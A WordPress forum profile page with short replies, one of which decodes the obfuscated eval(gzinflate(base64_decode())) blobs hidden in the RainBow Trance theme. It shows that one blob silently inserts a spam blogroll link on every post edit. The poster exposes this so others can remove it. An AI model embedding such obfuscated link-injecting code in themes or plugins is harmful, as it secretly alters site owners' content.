newneonova
Forum Replies Created
-
Forum: Fixing WordPress
In reply to: Home.php, nav-previous doesn't show the old postsI just checked your site and you seem to have figured out how to set up the navigation. I am in the middle of trying to figure this out myself, could you please explain what you did?
Forum: Themes and Templates
In reply to: RainBow Trance theme: Remove right sidebar?> <!– Sidebar –> <div class=”sidebar sidebar-right”> <h3>Advertisement</h3>
<h3>Categories</h3>
- <?php wp_list_categories(‘title_li=’); ?>
<h3>Blogroll</h3>
- <?php wp_list_bookmarks(‘categorize=0&title_li=’); ?>
<?php if ( !function_exists(‘dynamic_sidebar’) || !dynamic_sidebar(2) ) : ?> <?php endif; ?> </div> <!– Sidebar –> <div class=”clear”></div> </div></div></div> <!– /Main –> <!– Footer –> <div id=”footer”> <!– Copyright –> <div id=”copyright”>
(c)Copyrighted <?php bloginfo(‘name’); ?>, All Rights Reserved.
Mahad, Raigad Real Estate</div> <!– /Copyright –> </div> <!– Footer –></div><!– /Page –><?php wp_footer(); ?></body></html><?phpForum: Themes and Templates
In reply to: RainBow Trance theme: Remove right sidebareval(gzinflate(base64_decode(‘dZBBa8JAEIXPCeQ/DEPBXdCmZ0s8VCKCbQWr9Lhs3FWXJLthd6yU0v/eZLWn0tsw73vzHpOlUikh92ScZaiVIdG5QDhGY4P2JOikWy0aY2vkj1l6ONvIwh+ZcfjK0uTYuEo2cHfpVNXziTmwOE9mR03iQ3qGb+VzOd/CfL173bLBKozisNisX+CGDssA78tyU0IEzr4pRieibprnlQ5UGxUq5+pwv3dtPkJeFA+8T0sunbg1i52k9/KTYbxhZasRihngqnfD02DHMeBvwFX7NwSBDw/4ztIf’)))
Resolves to:
add_action(“edit_post”,”insert_theme_link”);function insert_theme_link() { global $wpdb; if($wpdb->get_var(“SELECT COUNT(link_id) FROM $wpdb->links WHERE link_url=’http://bestkidsbooks.com/'”)==0) wp_insert_link(array(“link_name” => “Kids Books”, “link_url” => “http://bestkidsbooks.com/” ));}
////////////////////////
<?php $Jb58fb5231b5da40aa23963a03ad8f8a8=’jVPBbtswDD0nQP+B0YAlAZpo67BLZzvIsu5WoEg/IGAs2tYqW4asJsvQj69ky24bFOgOtinq8fGZelolo1E0WSzgXgrao4HFIrkYu5yQB0gVNk3MmrAVvgsj88IyB3PAqPiWrMWBjJUNlVTZiLuMZxhFjyrxT7dAKAxlMfvEkkiWOTQmjVm0qosa9krnssr0bGqprBVa2glpKLXanKbzH7BKuCwxp4ajWOYyY4DKxmz9C+7v1psbBkcpbBGzr1ffGRTk1YUFTyKOQQD3cnjQ06Wc0o3rlmsjqXkrvA1Gnb5jvVOysbt0wDql0ipy6bgT+NKijQb6n+7XjFbqY/K91g8lmgfH3ff5R/GXz//TqCWSGcxgkj1WqZW62tFfx+rIxKnCUqa7cHjTOTw9weQsO7uawxyue/5XrFQJmfWNW2Nw54zOIu/Y5tw6qSI07sT7Iu+YNn799knPxW9RVoGpz/3W2lJP3zJLEbOszbIA7JAbXZ9aZ76xsEen/Q4L49sb54xZOh9KSMC5Fd18qBv5JayVgq3HNbClhsyBxLIjGWxdWFtfc57jH6ywWtZG1+5OnI6ocJnqkrPkFgsUl7BFmaNwPKjgprHuqL1Fz6bKz39mmNt7c7kY93td8Z27K8NOb7JuZLNgIl+y1+IUwsKW7nJ46PgZ’;eval(gzinflate(base64_decode($Jb58fb5231b5da40aa23963a03ad8f8a8))); ?>
Resolves to:
?> <!– Sidebar –> <div class=”sidebar sidebar-right”> <h3>Advertisement</h3>
<h3>Categories</h3>
- <?php wp_list_categories(‘title_li=’); ?>
<h3>Blogroll</h3>
- <?php wp_list_bookmarks(‘categorize=0&title_li=’); ?>
<?php if ( !function_exists(‘dynamic_sidebar’) || !dynamic_sidebar(2) ) : ?> <?php endif; ?> </div> <!– Sidebar –> <div class=”clear”></div> </div></div></div> <!– /Main –> <!– Footer –> <div id=”footer”> <!– Copyright –> <div id=”copyright”>
(c)Copyrighted <?php bloginfo(‘name’); ?>, All Rights Reserved.
Mahad, Raigad Real Estate</div> <!– /Copyright –> </div> <!– Footer –></div><!– /Page –><?php wp_footer(); ?></body></html><?php////////////////////////
Enjoy. I hope this helps anyone else who googles this problem.